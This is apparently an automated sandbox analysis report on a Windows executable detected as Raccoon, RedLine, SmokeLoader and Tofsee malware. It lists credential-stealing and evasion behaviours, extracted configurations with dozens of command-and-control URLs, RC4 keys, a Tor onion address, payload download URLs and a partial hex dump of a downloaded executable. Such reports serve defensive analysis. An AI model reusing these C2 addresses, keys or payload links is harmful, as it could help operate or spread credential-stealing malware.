Windows Analysis Report bNdOhKPy0F.exe

Overview

General Information

Sample Name: bNdOhKPy0F.exe
Analysis ID: 435324
MD5: c5c9a99d045fd2b0380e2b7e3fd28189
SHA1: 56d82d12434d7069bfccc93d35d7312289b65ea8
SHA256: ae7ae9ea7fd0100b620704d462083caaedda2c5c5618ceeca54c1d7673b6be4a
Tags: exe
Infos:

Most interesting Screenshot:

Detection

Raccoon RedLine SmokeLoader Tofsee
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
DLL reload attack detected
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected SmokeLoader
Yara detected Tofsee
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
DLL side loading technique detected
Deletes itself after installation
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found Tor onion address
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Removes signatures from Windows Defender
Renames NTDLL to bypass HIPS
Sample uses process hollowing technique
Sigma detected: Copying Sensitive Files with Credential Data
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://91.212.150.205/filename.exe Avira URL Cloud: Label: malware
Source: http://999080321test51-service10020125999080321.xyz/ Avira URL Cloud: Label: malware
Source: http://999080321test15671-service10020125999080321.tech/ Avira URL Cloud: Label: malware
Source: http://999080321test13461-service10020125999080321.net/ Avira URL Cloud: Label: malware
Source: http://999080321test51-service10020125999080321.xyz/raccon.exe Avira URL Cloud: Label: malware
Source: http://999080321newfolder1002002131-service1002.space/ Avira URL Cloud: Label: malware
Source: http://95.213.144.186:8080/3.php Avira URL Cloud: Label: malware
Source: http://999080321test146831-service10020125999080321.space/ Avira URL Cloud: Label: malware
Source: http://999080321newfolder1002002231-service1002.space/ Avira URL Cloud: Label: malware
Source: http://999080321test13561-service10020125999080321.su/ Avira URL Cloud: Label: malware
Source: http://999080321test134831-service10020125999080321.space/ Avira URL Cloud: Label: malware
Source: http://999080321newfolder1002002431-service1002.space/ Avira URL Cloud: Label: malware
Source: http://999080321uest71-service100201dom25999080321.ru/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000001.00000002.299990190.0000000000460000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://999080321newfolder100251-service25999080321.ru/", "http://999080321newfolder1002-01432599908032135.site/", "http://999080321newfolder1002-01482599908032135.site/", "http://999080321newfolder1002-01322599908032135.site/", "http://999080321newfolder1002-012625999080321.ga/", "http://999080321newfolder1002-01422599908032135.site/", "http://999080321newfolder1002-01362599908032135.site/", "http://999080321test281-service10020125999080321.ru/", "http://999080321test41-service100201pro25999080321.ru/", "http://999080321newfolder1002-01332599908032135.site/", "http://999080321newfolder1002-012725999080321.cf/", "http://999080321yest31-service100201rus25999080321.ru/", "http://999080321test261-service10020125999080321.space/", "http://999080321newfolder1002-01382599908032135.site/", "http://999080321test12671-service10020125999080321.online/", "http://999080321newfolder1002-01532599908032135.site/", "http://999080321yes1t3481-service10020125999080321.ru/", "http://999080321test125831-service10020125999080321.space/", "http://999080321test571-service10020125999080321.pro/", "http://999080321newfolder1002-service100201blog25999080321.ru/", "http://999080321uest71-service100201dom25999080321.ru/", "http://999080321newfolder1002-01452599908032135.site/", "http://999080321newfolder1002-01542599908032135.site/", "http://999080321test13561-service10020125999080321.su/", "http://999080321newfolder1002-01392599908032135.site/", "http://999080321newfolder1002-01552599908032135.site/", "http://999080321utest1341-service10020125999080321.ru/", "http://999080321test136831-service10020125999080321.space/", "http://999080321test461-service10020125999080321.host/", "http://999080321newfolder1002-service100201life25999080321.ru/", "http://999080321newfolder33417-012425999080321.space/", "http://999080321proftest981-service10020125999080321.ru/", "http://999080321newfolder1002002131-service1002.space/", "http://999080321newfolder471-service10020125999080321.ru/", "http://999080321test11-service10020125999080321.press/", "http://999080321rest21-service10020125999080321.eu/", "http://999080321newfolder100231-service1022020.ru/", "http://999080321newfolder1002002231-service1002.space/", "http://999080321megatest251-service10020125999080321.ru/", "http://999080321newfolder1002-01442599908032135.site/", "http://999080321newfolder100241-service10020999080321.ru/", "http://999080321test231-service10020125999080321.fun/", "http://999080321kupitest451-service10020125999080321.ru/", "http://999080321newfolder1002-01402599908032135.site/", "http://999080321clubtest561-service10020125999080321.ru/", "http://999080321newfolder3100231-service1002.space/", "http://999080321infotest341-service10020125999080321.ru/", "http://999080321newfolder351-service10020125999080321.ru/", "http://999080321newfolder1002-01352599908032135.site/", "http://999080321yirtest231-service10020125999080321.ru/", "http://999080321newfolder1002-012925999080321.com/", "http://9990
Source: 31.2.6ACA.exe.400000.0.unpack Malware Configuration Extractor: Raccoon Stealer {"RC4_key2": "867eb851757c27a35e8edea2d42db972", "C2 url": "https://tttttt.me/mimimimaxormin", "Bot ID": "50f8ded12c46443e43915127b1219ac2fc439bb6", "RC4_key1": "$Z2s`ten\\@bE9vzR"}
Source: 18.2.2531.exe.3c51458.1.raw.unpack Malware Configuration Extractor: RedLine {"C2 url": ["87.251.71.118:80"], "Bot Id": "newID"}
Multi AV Scanner detection for domain / URL
Source: 999080321test51-service10020125999080321.xyz Virustotal: Detection: 13% Perma Link
Multi AV Scanner detection for submitted file
Source: bNdOhKPy0F.exe Virustotal: Detection: 34% Perma Link
Yara detected Raccoon Stealer
Source: Yara match File source: 00000022.00000003.440389485.0000000004FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.447043795.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.429961512.0000000004FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.472532667.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.474383146.0000000004F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.443191726.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 31.2.6ACA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.3.6ACA.exe.4fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.4eb0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.88A3.exe.4fd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.6ACA.exe.4f10e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.6ACA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.4eb0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.6ACA.exe.4f10e50.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.88A3.exe.4fd0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.3.6ACA.exe.4fb0000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: bNdOhKPy0F.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 32.2.svchost.exe.140000000.3.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 28.2.5CDE.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 26.2.4DAB.exe.140000000.3.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 28.2.5CDE.exe.33b0e50.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 28.3.5CDE.exe.33f0000.0.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Unpacked PE file: 26.2.4DAB.exe.140000000.3.unpack
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Unpacked PE file: 28.2.5CDE.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Unpacked PE file: 31.2.6ACA.exe.400000.0.unpack
Source: C:\Windows\System\svchost.exe Unpacked PE file: 32.2.svchost.exe.140000000.3.unpack
Source: C:\Users\user\AppData\Local\Temp\88A3.exe Unpacked PE file: 34.2.88A3.exe.400000.0.unpack
Uses 32bit PE files
Source: bNdOhKPy0F.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 95.216.186.40:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.297207048.0000000006FE0000.00000002.00000001.sdmp
Source: Binary string: JC:\fuyapevega.pdb source: bNdOhKPy0F.exe, 00000000.00000000.227175282.0000000000430000.00000002.00020000.sdmp, webgfvd, 00000010.00000002.368726602.0000000000430000.00000002.00020000.sdmp
Source: Binary string: K:\work\for_renat\v2\sloader\x64\Release\sloader.pdb source: 4DAB.exe, 0000001A.00000002.431094760.0000000140000000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: bNdOhKPy0F.exe, 00000001.00000002.300200165.000000006E101000.00000020.00020000.sdmp, webgfvd, 00000018.00000002.383561832.000000006AC51000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdb source: bNdOhKPy0F.exe, webgfvd
Source: Binary string: C:\fuyapevega.pdb source: bNdOhKPy0F.exe, 00000000.00000000.227175282.0000000000430000.00000002.00020000.sdmp, webgfvd, 00000010.00000002.368726602.0000000000430000.00000002.00020000.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.297207048.0000000006FE0000.00000002.00000001.sdmp
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 4x nop then mov ecx, 00000008h 18_2_00E60CE8
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 18_2_00E633EE
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 18_2_00E633F8
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 18_2_00E63980
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 18_2_00E63988

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://999080321newfolder100251-service25999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01432599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01482599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01322599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-012625999080321.ga/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01422599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01362599908032135.site/
Source: Malware configuration extractor URLs: http://999080321test281-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321test41-service100201pro25999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01332599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-012725999080321.cf/
Source: Malware configuration extractor URLs: http://999080321yest31-service100201rus25999080321.ru/
Source: Malware configuration extractor URLs: http://999080321test261-service10020125999080321.space/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01382599908032135.site/
Source: Malware configuration extractor URLs: http://999080321test12671-service10020125999080321.online/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01532599908032135.site/
Source: Malware configuration extractor URLs: http://999080321yes1t3481-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321test125831-service10020125999080321.space/
Source: Malware configuration extractor URLs: http://999080321test571-service10020125999080321.pro/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-service100201blog25999080321.ru/
Source: Malware configuration extractor URLs: http://999080321uest71-service100201dom25999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01452599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01542599908032135.site/
Source: Malware configuration extractor URLs: http://999080321test13561-service10020125999080321.su/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01392599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01552599908032135.site/
Source: Malware configuration extractor URLs: http://999080321utest1341-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321test136831-service10020125999080321.space/
Source: Malware configuration extractor URLs: http://999080321test461-service10020125999080321.host/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-service100201life25999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder33417-012425999080321.space/
Source: Malware configuration extractor URLs: http://999080321proftest981-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002002131-service1002.space/
Source: Malware configuration extractor URLs: http://999080321newfolder471-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321test11-service10020125999080321.press/
Source: Malware configuration extractor URLs: http://999080321rest21-service10020125999080321.eu/
Source: Malware configuration extractor URLs: http://999080321newfolder100231-service1022020.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002002231-service1002.space/
Source: Malware configuration extractor URLs: http://999080321megatest251-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01442599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder100241-service10020999080321.ru/
Source: Malware configuration extractor URLs: http://999080321test231-service10020125999080321.fun/
Source: Malware configuration extractor URLs: http://999080321kupitest451-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01402599908032135.site/
Source: Malware configuration extractor URLs: http://999080321clubtest561-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder3100231-service1002.space/
Source: Malware configuration extractor URLs: http://999080321infotest341-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder351-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01352599908032135.site/
Source: Malware configuration extractor URLs: http://999080321yirtest231-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-012925999080321.com/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01512599908032135.site/
Source: Malware configuration extractor URLs: http://999080321test14781-service10020125999080321.info/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01492599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01342599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-012825999080321.gq/
Source: Malware configuration extractor URLs: http://999080321newfolder1002002431-service1002.space/
Source: Malware configuration extractor URLs: http://999080321yomtest251-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321test146831-service10020125999080321.space/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-012525999080321.ml/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01522599908032135.site/
Source: Malware configuration extractor URLs: http://999080321test13461-service10020125999080321.net/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01412599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01502599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder4561-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002002531-service1002.space/
Source: Malware configuration extractor URLs: http://999080321test61-service10020125999080321.website/
Source: Malware configuration extractor URLs: http://999080321test51-service10020125999080321.xyz/
Source: Malware configuration extractor URLs: http://999080321mytest151-service1002012425999080321.ru/
Source: Malware configuration extractor URLs: http://999080321test391-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321besttest971-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01312599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder241-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder100221-service1022020.ru/
Source: Malware configuration extractor URLs: http://999080321test481-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321rustest213-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321test147831-service10020125999080321.space/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01302599908032135.site/
Source: Malware configuration extractor URLs: http://999080321tostest371-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321oopoest361-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-service100201shop25999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfoldert161-service1002012425999080321.ru/
Source: Malware configuration extractor URLs: http://999080321shoptest871-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01372599908032135.site/
Source: Malware configuration extractor URLs: http://999080321newfolder481-service10020125999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01462599908032135.site/
Source: Malware configuration extractor URLs: http://999080321est213531-service1002012425999080321.ru/
Source: Malware configuration extractor URLs: http://999080321newfolder1002-01472599908032135.site/
Source: Malware configuration extractor URLs: http://999080321test15671-service10020125999080321.tech/
Source: Malware configuration extractor URLs: http://999080321test134831-service10020125999080321.space/
Source: Malware configuration extractor URLs: https://tttttt.me/mimimimaxormin
Found Tor onion address
Source: 4DAB.exe, 0000001A.00000002.431094760.0000000140000000.00000040.00020000.sdmp String found in binary or memory: http://kzeaqky6axif3jukzx7jj7ylhfgtytpb3xeojsfigogriyv6bv3cimyd.onion/index.php
Source: 4DAB.exe, 0000001A.00000002.431094760.0000000140000000.00000040.00020000.sdmp String found in binary or memory: af-zaar-aear-bhar-dzar-egar-iqar-joar-kwar-lbar-lyar-maar-omar-qaar-saar-syar-tnar-yeaz-az-cyrlaz-az-latnbe-bybg-bgbn-inbs-ba-latnca-escs-czcy-gbda-dkde-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ares-boes-cles-coes-cres-does-eces-eses-gtes-hnes-mxes-nies-paes-pees-pres-pyes-sves-uyes-veet-eeeu-esfa-irfi-fifo-fofr-befr-cafr-chfr-frfr-lufr-mcgl-esgu-inhe-ilhi-inhr-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inkok-inko-krky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-bnms-mymt-mtnb-nonl-benl-nlnn-nons-zapa-inpl-plpt-brpt-ptquz-boquz-ecquz-pero-roru-rusa-inse-fise-nose-sesk-sksl-sisma-nosma-sesmj-nosmj-sesmn-fisms-fisq-alsr-ba-cyrlsr-ba-latnsr-sp-cyrlsr-sp-latnsv-fisv-sesw-kesyr-syta-inte-inth-thtn-zatr-trtt-ruuk-uaur-pkuz-uz-cyrluz-uz-latnvi-vnxh-zazh-chszh-chtzh-cnzh-hkzh-mozh-sgzh-twzu-zaarbgcazh-CHScsdadeelenesfifrhehuisitjakonlnoplptroruhrsksqsvthtruride+000USER32.DLLMessageBoxWGetActiveWindowGetLastActivePopupGetUserObjectInformationWGetProcessWindowStationCreateFile2CONOUT$1#SNAN1#IND1#INF1#QNANhttp://kzeaqky6axif3jukzx7jj7ylhfgtytpb3xeojsfigogriyv6bv3cimyd.onion/index.phphttp://127.0.0.1/http://google.com%orbwbab%i.%i.%inull%1.15g%lg%1.17g""u%04x
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: 999080321test51-service10020125999080321.xyz
Source: C:\Windows\SysWOW64\explorer.exe DNS query: 999080321test51-service10020125999080321.xyz
Tries to resolve many domain names, but no domain seems valid
Source: unknown DNS traffic detected: query: 999080321newfolder33417-012425999080321.space replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321test15671-service10020125999080321.tech replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321test13461-service10020125999080321.net replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321newfolder1002002131-service1002.space replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321test136831-service10020125999080321.space replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321test147831-service10020125999080321.space replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321test12671-service10020125999080321.online replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321test61-service10020125999080321.website replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321test125831-service10020125999080321.space replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321newfolder3100231-service1002.space replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321test134831-service10020125999080321.space replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321est213531-service1002012425999080321.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321test13561-service10020125999080321.su replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321uest71-service100201dom25999080321.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321newfolder1002002231-service1002.space replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321newfolder1002002531-service1002.space replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321test146831-service10020125999080321.space replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321utest1341-service10020125999080321.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321yes1t3481-service10020125999080321.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321newfolder1002002431-service1002.space replaycode: Name error (3)
Source: unknown DNS traffic detected: query: 999080321test14781-service10020125999080321.info replaycode: Name error (3)
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49727 -> 95.213.144.186:8080
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 16 Jun 2021 10:19:36 GMTContent-Type: application/x-msdos-programContent-Length: 24576Connection: keep-aliveKeep-Alive: timeout=3Last-Modified: Tue, 09 Mar 2021 20:06:33 GMTETag: "6000-5bd201642cd53"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 4b c4 db 9d 2a aa 88 9d 2a aa 88 9d 2a aa 88 1e 36 a4 88 9c 2a aa 88 f4 35 a3 88 9f 2a aa 88 74 35 a7 88 9c 2a aa 88 52 69 63 68 9d 2a aa 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee fd 3a 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 00 00 00 20 00 00 00 00 00 00 78 12 00 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 16 00 0b 00 04 00 00 00 00 00 00 00 00 60 00 00 00 10 00 00 83 62 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 2e 00 00 28 00 00 00 00 50 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 22 00 00 00 10 00 00 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 84 03 00 00 00 40 00 00 00 10 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 0a 00 00 00 50 00 00 00 10 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 